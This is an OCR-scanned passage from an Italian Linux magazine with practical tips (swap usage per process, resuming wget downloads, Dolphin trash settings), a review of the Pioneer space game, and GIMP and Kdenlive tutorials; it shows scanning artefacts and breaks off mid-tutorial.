che la quantità di RAM installata nel 
PC, è sufficiente digitare il comando 
free -h e, relativamente alla riga 
swap, leggere i valori delle prime tre 
colonne che indicano rispettivamente 
il quantitativo totale, quello usato e 
quello libero. Se sul sistema la me- 
moria di swap risulta in uso, possia- 
mo anche vedere a quali processi è 
stata assegnata estraendo alcune in- 
formazioni dalla cartella /proc. Infatti, 
per ogni processo, che all'interno del- 
la cartella /proc viene identificato con 
un numero (il PID), esiste il file status 
che contiene tale informazione alla 
voce VmSwap. Partendo da questa 
premessa, basta una sola riga di co- 
mando per conoscere l'utilizzo della 
memoria di swap da parte di tutti i 
processi in esecuzione: for file in / 
proc/*/status ; do grep -E 
'VmSwap|Name' $file | tr -d '\n'j 
echo -e "\n"; done. Dopo aver pre- 
muto Invio, per ogni PID, appariranno 
il nome del processo e l'informazione 
relativa all'uso della swap. Il comando 
digitato, infatti, non fa altro che ana- 
lizzare con un ciclo di for tutti i file 
status presenti nella cartella proc e 
filtrare ognuno di essi tramite grep 
per ricercare il loro nome (Name), 
presente per tutti e il valore di swap 


(VmSwap), che potrebbe essere de- 
finito solo per alcuni di essi. Infine, il 
valore in uscita da questa prima ana- 
lisi è filtrata dal comando tr che ri- 
muove le nuove linee per poi aggiun- 
gere manualmente un comando per 
andare a capo (echo -e "r") alla fine 
della ricerca. Per una consultazione 
più attenta il risultato può anche es- 
sere inoltrato verso un file di testo 
aggiungendo, al termine del coman- 
do appena visto, il carattere maggio- 
re seguito dal nome del documento; 
ad esempio > uso_memoria_di_ 
swap.txt. 


INTERROMPERE 
E RIPRENDERE 
I DOWNLOAD 


Anche se le connessioni a In- 

ternet sono sempre più veloci e 
quindi i download, anche di file di 
grandi dimensioni, richiedono relati- 
vamente poco tempo, esistono co- 
munque molte condizioni per cui sa- 
rebbe auspicabile evitare di iniziare 
nuovamente da zero a scaricare un 
file. Pensiamo infatti a chi non può di- 
sporre di linee veloci, o magari a chi 
usa connessioni con volumi di traffico 
predefinito (e quindi è bene non supe- 
rare le soglie per evitare di spendere 
soldi inutilmente). È anche possibile 
che i download si interrompano per 
qualche strano motivo o che si desi- 
deri sospendere temporaneamente il 
trasferimento per poi riprenderlo in un 
secondo momento, magari usando 
un PC differente. Se ci si riconosce in 
uno di questi casi o se si individua 
una propria necessità specifica è suf- 
ficiente, per aggirare il problema, 
usare il programma wget con lo sw- 
tich -c prima della URL che indica il 
file da scaricare. Infatti, il comando 
wget, se usato senza opzioni, prov- 
vede a scaricare localmente un file 
indicato, ma se si aggiunge l'opzione 
c il programma verificherà prima la 
presenza del file in locale (che ovvia- 
mente deve avere lo stesso nome di 
quello remoto) e in caso affermativo 
lo considererà come una parte già 
scaricata e inizierà il download dal 
punto immediatamente successivo. 


Per provarne il comportamento è suf- 
ficiente individuare ad esempio un 
file ISO di una qualsiasi distribuzione 
GNU/Linux e, dopo aver aperto una 
finestra del terminale, incollare l'URL 
subito dopo il comando wget e pre- 
mere Invio per iniziare il download. 
Ad esempio, per scaricare l'ultima 
release di Debian disponibile al mo- 
mento in cui scriviamo ci basta lan- 
ciare wget http://cdimage.debian. 
org/debian-cd/8.4.0/multi-arch/ 
iso-cd/debian-8.4.0-amd64-i386- 
netinst.iso. Dopo aver atteso il tem- 
po necessario per raggiungere una 
percentuale significativa e quindi 
dopo aver visto comparire tra le due 
parentesi quadrate un po' di caratte- 
ri uguali seguiti dal maggiore (===>) 
che indicano l'avanzamento del lavo- 
ro, premiamo CTRL + c per interrom- 
pere l'esecuzione. A questo punto, 
all'interno della cartella di lavoro ci 
troveremo parte del file che abbiamo 
scaricato, che nel nostro esempio 
sarà —debian-8.4.0-amd64-i386- 
netinst.iso. Se quindi rieseguiamo 
il comando wget con l'opzione -c 
proseguiremo il download dal punto 
esatto in cui lo abbiamo sospeso. 
Potremo accorgerci di questo com- 
portamento sia perché apparirà nel- 
la finestra di esecuzione la dicitura 
“Partial Content” (contenuto par- 
ziale) con le relative informazioni della 
dimensione globale e di quanto anco- 
ra da scaricare, sia perché la percen- 
tuale inizierà direttamente dal valore 
raggiunto in precedenza e all'interno 
delle due parentesi quadre vedremo 
una serie di segni + che precedono 
la nuova serie di uguali e il maggiore, 
ad indicarci che tale porzione risulta- 
va già presente sul disco all'avvio del 
download. 


KDE, DOLPHIN 
E LA GESTIONE 
DEL CESTINO 


50%, Tutti i sistemi desktop imple- 
55 mentano la funzionalità del 
cestino, ovvero un luogo (altro non è 
che una cartella) dove vengono spo- 
stati i file che cancelliamo in modo da 
poterli recuperare in caso di errori. 


Preferenze di Dolphin 
Cestino 


__ Elimina file più vecchi di: (79 
v Limita alla dimensione massima 


Modalità di 


visualizzazione Quando viene raggiunto il limite: 


Dimensione massima: 10,000 % $ 


(873,40 MiB) 


d Avvisami & 


Navigazione 
Servizi 


Cestino 


t» Valori predefiniti 


E Fig. 2 * Le opzioni per la gestione automatica 


del cestino in Dolphin su KDE 


Succede però che spesso i cestini 
vengano riempiti fino all'orlo (metafo- 
ricamente) per poi essere svuotati 
saltuariamente o quando compaiono 
avvisi di fine spazio su disco. Non che 
vi sia nulla di male in queste abitudini, 
ma forse non molti sono a conoscen- 
za di alcuni possibilità avanzate, mes- 
se a disposizione dai vari sistemi 
come ad esempio Dolphin, il file ma- 
nager di KDE, che possono rendere 
tutto più semplice e veloce. Infatti, 
basta accedere alla sue Preferenze 
(dal menu Controllo > Configura 
Dolphin) e cliccare sull'icona del ce- 
stino per scoprire che possono esse- 
re attivate le cancellazioni automati- 
che dei file più vecchi di un 
determinato numero di giorni, oppure 
che sia possibile limitarne la dimen- 
sione massima e quale comporta- 
mento adottare una volta che questa 
sia stata raggiunta, scegliendo tra un 
semplice avviso o l'eliminazione auto- 
matica dei file più vecchi o di quelli 
più grandi presenti al suo interno. 

In pratica, quindi, agendo su poche 
semplici configurazioni, sarà possi- 
bile mantenere il sistema efficiente 
evitando di perdere tempo e soprat- 
tutto documenti preziosi come invece 
potrebbe accadere quando si agisce 
velocemente sotto la pressione eser- 
citata dalla necessità di liberare spa- 
zio a tutti i costi. 
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0000 


Corri verso. 


l'infinito e oltre! 


E Alla guida di un'astronave, puoi entrare nel commercio 
di merci, nella pirateria o darti a spettacolari combattimenti: 
questo è Pioneer, il simulatore che ti porta dritto al futuro 


Pioneer 20160316 


| Licenza: GNU GPL Tipo: Gioco Sito Web: http://pioneerspacesim.net 


una ventata di nuovi giochi per il nostro sistema opera- 

tivo è fuori discussione, ma non dobbiamo dimenticarci 
degli sviluppatori indipendenti sparsi nelle varie parti del mon- 
do che danno luogo a titoli videoludici di tutto rispetto e il più 
delle volte paragonabili alle controparti commerciali. In questa 
occasione, abbiamo deciso di puntare i riflettori su Pioneer, 
un simulatore di combattimenti, esplorazioni e commercio nel- 
lo spazio. Gli appassionati della saga Star Trek o del telefilm 
Spazio 1999 saranno contenti di navigare tra migliaia di pianeti 
unici, sistemi stellari da esplorare, federazioni e confederazioni 


(@ Steam (http:/store.steampowered.com) abbia portato 


REQUISITI DI SISTEMA 


Il necessario per giocare 

Coloro che volessero provarlo, e ricordano con piacere la 
piattaforma Amiga, noteranno come Pioneer si ispiri al 
vecchio titolo Frontier: Elite II, ovviamente con una grafi- 
ca più attualizzata. Il gioco è scritto in C++ e Lua. Inoltre, 
utilizza le OpenGL per il rendering. A patto di rispettare 

un minimo di vincoli sull'hardware, tutti possono lanciare 
Pioneer anche su PC non all'ultimo grido. Va da sé che in 
questi casi occorrerà rinunciare ad impostazioni aggressive 
dei dettagli grafici. Così un dual-core AMD o Intel da 2 GHz, 
2 GB di RAM e una scheda grafica di fascia medio-bassa 
con attivata l'accelerazione 3D in hardware utilizzando gli 
appositi driver sono requisiti sufficienti. Aggiungiamo che 
la scheda grafica deve supportare le OpenGL almeno in 
versione 3.1 (anno 2009) a seguire, ad esempio dalla serie 
Radeon HD della ATI/AMD oppure una nVidia GeForce 8000 
o GTX100 e superiori. 
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Pioneer 


Continua partita 
Parti dalla Terra 
Parti da New Hope 


Parti dalla Stella di Barnard 


Carica partita 


Opzioni 


Esci 


Ibuila: 2B16@3t M4cm 


Fig.1*Inprimo piano si alternano le astronavi presenti nel gioco 


planetarie nelle quali imbattersi e diverse centinaia di missioni 
per le quali rendersi disponibili dietro compenso e che possono 
fare la propria fortuna nel gioco. Ma procediamo con ordine e 
passiamo all'installazione. 


DOWNLOAD E LANCIO 


Pioneer è disponibile per diversi sistemi operativi: Mac OS X, 
Microsoft Windows e, ovviamente, anche GNU/Linux. Poiché 
attivamente sviluppato, abbastanza di frequente vengono com- 
pilati i binari che vengono messi a disposizione nella sezione 
Download del sito Web ufficiale. Da quest'ultimo scarichiamo 
il file pioneer-20160316-linux64.tar.bz2 (circa 240 MB), o la 
versione per processori a 32 bit, qualora fossimo in possesso 
di una tale architettura. Apriamo un terminale, spostiamoci nel 
percorso nel quale abbiamo salvato l'archivio (cd /percorso/ 
file) e estraiamone il contenuto con il comando tar xjvf pio- 
neer-20160316-linux64.tar.bz2. In seguito alla decompres- 
sione/estrazione, verrà creata la cartella pioneer-20160316- 
linux64: entriamo in essa e lanciamo il file pioneer cliecandoci 
sopra oppure lanciando da terminale il comando ./pioneer. 
Dopo qualche secondo necessario al caricamento dei dati e 


visibile in Fig. =E “ma in lingua inglese. Allora, il primo passo 
rà localizzare il “gioco in una lingua: più familiare: dal menu 
generale, ‘spostiamoci in Options, clicchiamo sulla terza icona 
alto a sinistra (u globo stilizzato) ed optiamo per Italiano. 
Ritorniar menu principale con l'omonimo tasto in basso e 


jenza con Pioneer. Seguiamo i tre tutorial per conoscere la 
amica di base del simulatore. î 


UNA PANORAMICA 


li gioco in sé “non ha alcun particolare obiettivo da conseguire. 
Esiste solo la. modalità di gioco single-player pertanto ogni gio- 
catore è libero. d "comportarsi come meglio crede: ad esempio, 


splorare nuovi “mondi e al tempo stesso accumulare denaro 


‘quale, alla stregua di una comune automobile, può essere ven- 
‘duta per acquistarne una nuova, così come è possibile miglio- 
rare il proprio equipaggiamento acquistando ciò che ci occorre a 
econda dei casi. Ma un'astronave consuma combustibile e per 
rifornirla occorre pagare il distributore di carburante. Necessi- 


del combustibile. Ne consegue che non possiamo soltanto scor- 
— razzare per i vari pianeti, ma dovremo darci un minimo da fare 


Primi passi in Pioneer 


alla creazione dell' ‘universo, dovremmo vedere il menu generale . 


vviamo. il gioco. Ac questo punto, siamo pronti per far cono- 


per migliorare il proprio status e quello della propria astronave la 


tiamo pertanto della somma necessaria ogni volta che ci occorre : 


per guadagnare il minimo necessario, ma in che modo? Esistono 
tre metodi: commercio legale, pirateria e/o combattimenti. Natu- 
ralmente, maggiore ‘è la difficoltà dell'impresa maggiore sarà la 
ricompensa. Se abbiamo la possibilità di abilitare i dettagli grafici 
per il loro massimo avremo viste affascinanti del pianeta che las- 
ciamo o di quello sul quale siamo in avvicinamento grazie al ren- 
«.dering ottenuto con le OpenGL. Pioneer ha anche un realistico 


modello orbitale e di volo basato sulla fisica Newtoniana seb- 
- bene pecchi un po' sul modello atmosferico ancora un troppo 
rudimentale. Facciamo presente che se per un'errata manovra ci 


si schianta al suolo oppure se si-viene abbattuti da una navicella 


nemica, qualora volessimo entrare in conflitto con qualche altro 
mondo alieno, il gioco termina con l'immagine di una lapide con 
- l'eloquente scritta “R./.P. amico mio”. Il gioco ha inizio nell'anno 


3200, il 1° gennaio alle ore 13:30 su una navicella avente un cer- 
to tipo di caratteristiche in termini di carico massimo, autonomia, 
armi, ecc. La somma inizialmente a disposizione, da spendere 


| per carburante e/o equipaggiamento vario, è di 100$. Sono si- 


curamente pochi: dobbiamo guadagnarne di altri accettando 
qualche missione/consegna. Poiché eseguire l'operazione di at- 
terraggio è tutt'altro che banale, suggeriamo di'affidarsi al pilota 
automatico al fine di studiare le corrette manovre da eseguire. A 


- tal fine, si rivela utile la vista esterna che otteniamo premendo 


F1: pigiandolo una seconda volta, otterremo la vista siderale. 


Quali sono i settaggi da effettuare prima del decollo? 


Cont girazione vaeo [rsavvia di poco per appicare? 
Anohzane vaeo 


Qmstanea dettogh pianeta pzio 
” inverni Mouse Y 
ae SARA Abuta foste 
er pianeta Contratti 
i 


Dettagio frattali 


1157006 
© III 
Requisisc bersaglio mirato 
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© Faro Ansatrope 


®© LA GRAFICA 
UU ui ni Sistemata la localizzazione 


ul spostiamoci nella sezione 
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o, 
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20 


i 


5 missioni è il caso di capire 


et pale del gioco. Per iniziare 


video: clic sull'icona con la teleca- 


| mera. A seconda della potenza del 


PC possiamo essere più o meno 
aggressivi con i parametri. Possia- 
mo aumentare i livelli di dettaglio e 
abilitare le altre opzioni passo dopo 
passo fino a quando notiamo qual- 
che rallentamento. Ad ogni cambio 
dobbiamo riavviare il gioco. 


attraverso quali tasti interagire. Pio- 
neer non è un fast paced games per- 
tanto, se si escludono i combattimenti 
e a meno di volare rasenti al suolo, 
abbiamo sempre il tempo di rinfres- 
carci la memoria sui tasti da utiliz- 
zare. In Controlli, nel menu Opzioni, 
possiamo memorizzare [e cambiare) 
le funzioni dei tasti. 


le nostre missioni possiamo decidere 


. di partire da tre basi differenti: Terra, 


New Hope e dalla Stella di Barnard. 
Suggeriamo, poiché se ne conoscono 
già le località, di optare per una 
partenza dalla Terra, il cui riferi- 
mento di default è l'astroporto di Los 
Angeles. Successivamente, potremo 
esplorare le altre basi. 
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Diventa un corriere dello spazio! 


Rispondiamo a qualche annuncio di lavoro e aumentiamo il nostro budget 


LA NAVICELLA 

Prima di lanciarci nello spazio 

dobbiamo in primo luogo cono- 
scere le capacità della navicella a dispo- 
sizione all'inizio del gioco. Cliccliamo su 
Scheda Astronave (nel cockpit è la terza 
icona in basso a sinistra) oppure pre- 
miamo direttamente F3. L'astronave è la 
Sinonatrix (valore 219.000$) con le ca- 
ratteristiche mostrate nella schermata. 


Mantenendo premuto il pulsante centrale e ruotando al tempo 
stesso il mouse potremo girarci attorno mentre con la rotellina 
potremo avvicinarci/allontanarci dalla navicella nelle viste esterna 
e siderale. Terminata la prima consegna, possiamo spostarci nella 


Bacheca Annunci 


GLI ANNUNCI = 

1100$ iniziali finiscono subito 

se aspiriamo a fare i girovaghi 
dello spazio. È opportuno vedere qualche 
annuncio di lavoro nell'apposita bacheca 
cliccando sull'icona Comunicazioni (op- 
pure premendo F4). Nella nuova scher- 
mata, clicchiamo sull'icona con il block 
notes in alto a sinistra. Quelli in bianco 
marcato sono gli annunci validi. 


Bacheca Annun 


LE TRATTATIVE. 
Optiamo per una i consegna — 
5 facile: ad esempio, un pacco di 
materiale deperibile a Mexico City. Parti- 


_ ra la trattativa con il committente al qua- 


le potremmo rivolgere le domande ri- 
portate (il termine di consegna, ecc.). Se 
vogliamo accettare il lavoro è sufficiente 
optare prima per Ok accordato quindi su 
Riaggancia per prepararci al decollo. 


bacheca degli annunci dell'astroporto per vedere se c'è qualcosa 
che possa interessarci. Va da sé che senza carburante, o se lo 
terminiamo durante una ricognizione, saremo definitivamente 
persi nello spazio siderale! 


All'avventura nello spazio siderale | 


Prendiamo confidenza con la nostra astronave e incominciamo dad ovagare nello SR 


IL DECOLLO 

Premiamo F4 e clicchiamo 

sul grosso pulsante Richi- 
esta autorizzazione al lancio. Verremo 
subito riportati nella vista dall'astronave 
seguito dal decollo. Puntiamo il muso 
dell'astronave leggermente verso l'alto 
[tasto S) e avviamo i motori di propul- 
sione utilizzando il tasto I: mantenendolo 
premuto i motori rimarranno accesi, 
lasciandolo si spegneranno. 
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PILOTA AUTOMATICO 
"4. Acquisita una certa altezza 
premiamo F4: apparirà 
un menu in trasparenza. Dalla sezi- 
one Destinazioni di navigazione del 
sistema sceglieremo la destinazione 
di consegna (Mexico City, nel caso in 
figura) e dalla sezione di sinistra Au- 
topilota: Attracca alla stazione spa- 
ziale. La navicella automaticamente 
punterà all'astroporto di consegna. 


A DESTINAZIONE! 
1 8 © Indiversi casi sono necessa- 
ri viaggi le cui distanze sono 
misurate in AU (Unità Astronomiche]). 
Per velocizzare la consegna possiamo 
accelerare il tempo cliccando sulle 
icone con i simboli del play multiplo 
in basso a sinistra. Consegnato il ma- 
teriale ci verranno accreditati i soldi: 
premere F3 e cliccare sull'icona con il 
carrello per la verifica. 


6 ra f ica 


Dalla foto al dipinto 


E Grazie a GIMP, trasformiamo una fotografia in un dipinto 
su tela. Con i giusti accorgimenti riusciremo ad ingannare 


anche un occhio attento! 


uante volte ci è capitato di guardare una foto e pensare 
“è così perfetta che sarebbe la base per un bellissimo 
dipinto”. In effetti, se le fotografie sono oggi lo strumen- 
to migliore per rappresentare la realtà nei suoi minimi dettagli, i 
dipinti conservano quell’aura di classe che li porta ad essere più 


“artistici”, nella mentalità comune. Realizzare un buon dipinto non 


è affatto facile: certo, nemmeno realizzare una fotografia davvero 
buona lo è, ma scattare foto è una abilità che si può sviluppare con 
l’apprendimento e l’allenamento, mentre il disegno a mano libera 
richiede delle capacità manuali che si sviluppano durante l’infanzia 
e non si possono recuperare (se non con molta fatica) in età adulta. 
Le meraviglie del fotoritocco ci permettono, tuttavia, di aggirare 
il problema delle effettive abilità e trasformare una fotografia in 
un dipinto. Tra l’altro, considerato che ormai è possibile stampare 
addirittura su tela anche a casa propria utilizzando una comune 
stampante a getto di inchiostro (www.instructables.com/id/Inkjet- 
Printing-on-Fabric/), si può facilmente fingere di avere davvero 


realizzato un dipinto. Qualche numero fa, abbiamo scoperto come 
utilizzare GIMP per trasformare una fotografia in un disegno a 
matita. Trasformare una foto in un dipinto è più facile: si tratta più 
che altro di ridurre il numero di colori e di tonalità di luce. Anche 
i dipinti migliori non hanno mai più di qualche decina di diverse 
tonalità di colore: semplicemente, con l’utilizzo di tempere è troppo 
difficile realizzare tonalità davvero differenti fra loro. Una normale 
fotografia dispone di una tavolozza di oltre 16 milioni di colori: 
ovviamente troppi per un pittore. GIMP integra degli strumenti che 
ci permettono di ottenere un risultato molto simile a quello delle 
tempere. Inoltre, il filtro GIMPressionista permette, con alcuni 
accorgimenti, di simulare la presenza di pennellate sull'immagine. 
Naturalmente, non ogni foto è adatta ad essere trasformata in un 
dipinto: è prima di tutto bene osservare diversi dipinti realizzati 
dai nostri pittori preferiti, in modo da avere un’idea di come venga 
costruito un disegno a mano libera. Un dipinto non è mai troppo 
confuso: appaiono gli oggetti necessari ma non quelli superflui. 


Più contrasto nell’immagine 


Un dipinto non può avere tutte le sfumature di colore di una fotografia 


Luminosità-contrasto 


Regola luminosità e contrasto 
DSCO11G5IPC-2([DSCO1163] (importata) 


LUCE E CONTRASTO 

Apriamo la nostra fotografia originale in 

GIMP, ed aumentiamo luminosità e contrasto 
di 30 punti ciascuno (eventualmente, di meno se la foto 
perdesse troppi particolari). Possiamo farlo cliccando 
sul menu Colori/Luminosità e Contrasto. 


CON PIÙ DETTAGLI 

Applichiamo all'immagine una semplice ma- 

schera di contrasto, in modo da far apparire 
tutto a fuoco. La maschera di contrasto si trova nel menu 
Filtri/Miglioramento/Maschera di contrasto. Impostia- 
mo il raggio a 10 e l'ammontare a 2. 
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Gra f i ca 


Non si vedono, ad esempio, degli oggetti che si trovano per metà nella “inqua- 
dratura” e per metà al di fuori del quadro. Nei quadri più antichi, esiste una 
sola fonte di illuminazione, che è ovviamente il Sole. Nei ritratti, i soggetti 
hanno molti particolari, mentre gli sfondi risultano meno definiti in modo 
da attirare l’attenzione dello spettatore principalmente sul soggetto. Inoltre, 
la profondità di campo è massima: l’effetto Bokeh delle moderne macchine 
fotografico non è mai presente nei ritratti, perché si cerca sempre di simulare 
la profondità di campo dei nostri occhi che, essendo come dei grandangoli, rie- 
scono sempre a mettere a fuoco quasi tutto ciò che vediamo. A volte lo sfondo 
appare sfumato in lontananza, ma si tratta della prospettiva aerea di Leonardo 
da Vinci, ed è solo un metodo per simulare la foschia dovuta all’umidità 
ambientale (si riferisce esclusivamente ad oggetti distanti centinaia di metri 
dagli oggetti in primo piano). 


l’effetto GIMPressionista 


È Fig. 1 * L'effetto dipinto che vogliamo ottenere 


Costruiamo un livello in cui l'immagine sembra dipinta con pennellate 


serre o] 
[= Posterizza uw 0) è | imitnna 
Drammen dele) E 
Meeiti di posterizzazione: =; 
(9 sotegrione 


Bisio | Gecmouste | 


vo ron 


I 


POSTERIZZAZIONE 

Un dipinto non può certamente avere gli oltre 16 milioni 

di colori di una fotografia truecolor. Utilizzeremo quin- 
di lo strumento Colori/Posterizza per ridurre il numero di colori a 
solo 3. Ricordiamo che il bianco, il nero ed i grigi non contano. 


bricisogm = 
brichs2 pom 
burlap pom 
camvestpgm 


| marble.pgm / 
marble2.pgm i 
stone pgm 
mit struc pom 


COME LE PIUME 
Questo effetto richiede una configurazione lun- 


ga. Scelta la pre-impostazione feathers, spo- 
stiamoci nella scheda Carta ed impostiamo la scala a 30 
punti. Il rilievo deve essere zero ed il file da scegliere è 
defaultpaper.pgm. 
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Brelmpostazioni Carta Bennello Qrientamento | Dimengione : Piazzamento. Colore Generate 


Feathers hed Satva attuale. 


ie 
Sla LIAZARA MAGRA GIEZIZALI CARNIA Oct AA FAZZALIOTLAGI CIVICI CALL ci iadte 


GIMPRESSIONISTA 
Duplichiamo il livello attuale, cliccandoci sopra con il ta- 


sto destro del mouse e scegliendo la voce Duplica livel- 
lo. Lavorando sul duplicato, posizionato sopra l'originale, scegliamo 
l'effetto Filtri/Artistici/GIMPressionista. 


mi Y > 
f È 
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L'ORIENTAMENTO 
Nella scheda Orientamento si possono impostare 
6 direzioni, con angolo di partenza pari a 0 ed in- 
tervallo angoli pari a 120. L'orientamento deve essere di 


tipo adattivo. Possiamo cliccare sul pulsante aggiorna per 
avere una idea del risultato. 


SIMULARE UN VERO PENNELLO 


Un po’ di bricolage ed il risultato è assicurato! 


I due requisiti fondamentali sono un pezzo di stoffa bianca 
ed una carta da freezer. Si appoggia la stoffa su un asse da A tti P, 
stiro, e sopra di essa si pone la carta da freezer, con la parte i 
plastica della carta a contatto con la stoffa. Si passa il ferro 
da stiro sulla carta, in modo da far fondere la plastica ed in- 
collarla alla stoffa. Ora si può tagliare la stoffa/carta in un 
rettangolo che entra nella stampante a getto d'inchiostro: il 
foglio ottenuto va inserito di modo che la stampa venga ese- 
guita sul lato con la stoffa, non quello con la carta. 


n x etela 
" ded a ‘ fm = Coast 


o 


BI Fig. 2 * Nel particolare si notano le finte pennellate 


Pennellate più realistiche 


I bordi delle pennellate sono troppo netti: è necessario sfumarli 
du 


preimpostazioni Carta Pennello Qrientamento Dimensione | Piazzamento Colore Generale È GIMPressionista 


Variazioni dimensione: > 15 S 


Dimensione Minima: 


Preimpostazioni Carta Pennello Qrient: 


zo She 


Piazzamento 
Dimensione Massima: <— rm—____mm_—_—nm—€—©%@—o 40 >) 


(0) C Ime 
La dimensione dipende de: |. valore | fluttuante Olivi. 


È () Distribuito equamente 
- _/ Raggio 


o) Casuale 18) Adattivo 


\_/ Tonalità 
iL) Centrato 


emer ille 


Densità tratti: 


| 


her 


«E LA POSIZIONE 
02 La dimensione deve essere di tipo adattivo, così da se- 
guire l'immagine. La scheda Piazzamento ci permette 
di stabilire che il piazzamento deve avvenire casualmente, con 
una densità dei tratti di circa 35 punti. Poi clicchiamo OK. 


LA DIMENSIONE... 

Nella scheda Dimensione impostiamo 15 variazioni di- 

mensione. La dimensione minima dovrebbe essere cir- 
ca 20 e la massima circa 40, ma i valori possono essere modificati a 
piacere per ottenere pennellate più o meno grandi. 


Messe, è = GEE 
RI 
CI Fogg DSCOTICS.IPGIHI È 
I | 
Î 
ci | | 
Qrizzontale: {100 S| i li _I 
A | [en] CIN % DI n i 


Verticale: 


UNA SFOCATURA 

Dovremmo avere ottenuto una versione dell’im- 

magine realizzata con delle finte pennellate, che 
però sono troppo nette. Per sfumarle un po' utilizziamo Fil- 
tri/Sfocature/Gaussiana, impostando il raggio tra 5 e 10. 


IN TRASPARENZA 
Terminata la sfocatura, impostiamo l'opacità del li- 
vello superiore al 75%. L'immagine assomiglia già 

ad un dipinto, ma probabilmente il cielo ha delle sfumature ir- 

realistiche a causa dei molti toni di azzurro di cui è composto. 
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Miglioriamo il cielo e le ombre 


Sono presenti troppe sfumature di luminosità: riduciamole per realizzare un vero dipinto 


CHASHDZ 


LIVELLO TRASPARENTE 
01 Per correggere il cielo, la cosa migliore da fare è 
creare un nuovo livello, cliccando sull'apposito pul- 
sante nel pannello dei livelli. Il nuovo livello deve avere sfondo 
trasparente ed essere posizionato sopra gli altri. 


SI SELEZIONA E SI COPIA 
02 Lavorando sul livello intermedio, selezioniamo una 
porzione del cielo che sia di un colore uniforme, utiliz- 
zando lo strumento Selezione rettangolo. Provvediamo poi a copia- 
re (Ctrl+C) la selezione. 


INCOLLARE IL CIELO 

Ci spostiamo sul livello trasparente: incolliamo la se- 

lezione (Ctrl+V) più volte fino a coprire il cielo. Le varie 
copie si spostano con lo strumento Sposta. Infine, con la Sele- 
zione lazo, selezioniamo le eventuali eccedenze per cancellarle. 


SOLO BIANCO E NERO 
05 Duplichiamo il livello. Lavorando sulla copia posizio- 
nata più in alto, utilizziamo Colori/Soglia. Dobbiamo 
spostare la banda del nero finché si ottiene un'immagine abba- 
stanza definita. Un buon valore dovrebbe essere circa 90. 
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IN UN SOLO LIVELLO 
04 Il livello superiore deve avere opacità al 75%. Clic- 
chiamo sul livello intermedio con il tasto destro del 
mouse e scegliamo Fondi in basso. Ripetiamo l'operazione con il 
livello superiore, in modo da ottenere un unico livello. 


LA MODALITÀ LUCE 
0 6 Impostiamo la modalità del livello a Luce debole, e diminu- 
iamo l'opacità di modo che l'immagine conservi comunque 
una certa variabilità dei colori.Un valore intorno ad 80% dovrebbe ren- 
dere il giusto effetto. 


M u I t i me d i a 


Un fantasma 
nei tuoi video! 


M Esistono diversi metodi per inserire un fantasma in un filmato. 
Noi ti proponiamo la soluzione più semplice, rapida e che 


ti garantisce un risultato ottimale 


naggi ricorrenti nei film. E non parliamo solo dei film horror: 

una presenza evanescente può essere inserita anche in un 
film comico, in uno d'azione o ancora in un film romantico. Sempli- 
cemente, è un buon modo, ad esempio, per rendere l'idea di una 
persona che è venuta a mancare: è infatti istintivo per gli spettatori 
che vedono un personaggio comparire in trasparenza sopra gli al- 
tri componenti della scena supporre che questo personaggio sia 
deceduto ed appaia sotto forma di spettro. L'effetto è concettual- 
mente piuttosto semplice: un personaggio viene posizionato in so- 
vrimpressione su una scena, con l'opacità ben al di sotto del 100%. 
Esistono naturalmente diversi metodi per realizzare questo risultato. 
Il metodo forse più “elastico” è quello del chroma key: basta filma- 
re il fantasma su un sfondo verde, e poi rimuovere tale sfondo con 
l'effetto “Schermata blu” di Kdenlive. Il bello di questo approccio 
è che utilizzando la transizione Composito in Kdenlive si può po- 
sizionare il fantasma ovunque nella scena, ad esempio facendolo 


G li spettri, più comunemente chiamati fantasmi, sono perso- 


Una clip sopra l'altra 


fluttuare, e non ci si deve preoccupare più di tanto dei bordi della 
figura del fantasma. Questo metodo ha, tuttavia, un difetto: spesso, 
i fantasmi vengono realizzati con abiti lunghi e leggeri, mossi da una 
brezza (facilmente ricreabile con un ventilatore): il movimento dei 
vestiti e dei capelli rende molto difficile il chroma key e finirebbero 
per apparire nell'immagine finale anche dei pezzi di fondale verde. 
Inoltre, spesso sono necessarie delle semitrasparenze nei tessuti 
(ad esempio, il fantasma può essere ricoperto da un telo bianco). E 
se il fantasma deve avere delle interazioni con l'ambiente o con altri 
personaggi della scena, diventa molto complicato ricrearle in uno 
studio completamente verde privo di ogni altro oggetto. Senza con- 
tare che vi possono essere delle difficoltà a ricreare anche il corret- 
to punto di vista, ovvero la posizione della videocamera rispetto al 
fantasma ed al resto della scena. Insomma, lavorare con il chroma 
key per avere un fantasma che interagisce con gli altri attori non è 
impossibile, ma è molto complicato e funziona bene soltanto nelle 
produzioni abbastanza importanti. 


Le clip devono essere in sovrimpressione, quindi le posizioneremo in due tracce sovrapposte 


C0012.MP4 
7 secondi (1) 


C0013.MP4 
53 secondi (1) 


— Miglioramento 
C0014.MP4 E hi 


35 secondi > Movimento 
C0015.MP4 

1 minuti 27 secondi 
C0016.MP4 
59 secondi (1) 
C0017.MP4 

1 minuti 09 secondi (1) 


 * Sfocaenascondi 


RE 


Struttura spilla 


LE DUE CLIP... 
Abbiamo bisogno di due ingredienti fondamentali: la 


clip in cui appare l'attore e quella in cui appare il fan- 
tasma. Le dobbiamo posizionare nella timeline di Kdenlive: la clip 
dell'attore deve trovarsi sotto a quella con il fantasma. 
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< ® Manipolazione wi 
È 
È 
È 


3 0» Personalizzato | 
» Restringi e trasforma. 


«sE LE DUE TRACCE 
Possiamo posizionare la clip con l'attore nella traccia 


Video3 e quella con il fantasma nella traccia Video2. 
Spostiamo la clip del fantasma in modo che tale personaggio appaia 
quando lo vogliamo (quando l'attore si spaventa, ecc.). 


I TRUCCHI DEL MESTIERE 


In una produzione amatoriale è più facile sfruttare un piccolo trucco: 
si possono girare due filmati, uno in cui compare il fantasma ed un 
altro in cui appaiono tutti gli altri attori. Basta poi sovrapporre le 
due clip sfruttando la transizione Composito di Kdenlive, e l'effetto 
rotoscoping per limitare la sovrapposizione (e dunque l'effetto di 
semitrasparenza) all'area in cui si trova il fantasma. Il bello è che tutti 
gli oggetti che rimangono “fermi”, come quelli dello sfondo, appari- 
ranno invariati, mentre il fantasma appare semitrasparente rispetto 
allo sfondo stesso. Esiste anche un'alternativa, utile soprattutto nei 
primi piani: filmare il fantasma e gli altri eventuali attori in un'uni- 
ca clip, e poi realizzare una seconda clip con soltanto lo sfondo. A 
quel punto basta sovrapporre lo sfondo alla clip con il fantasma ed 
utilizzare il rotoscoping per far apparire lo sfondo, in semitraspa- 
renza, soltanto sopra al fantasma e non sopra gli altri attori. Questo 


Transizione e rotoscoping 4 


Sfruttiamo la transizione composito per ottenere la semitrasparenza 


LA TRANSIZIONE 

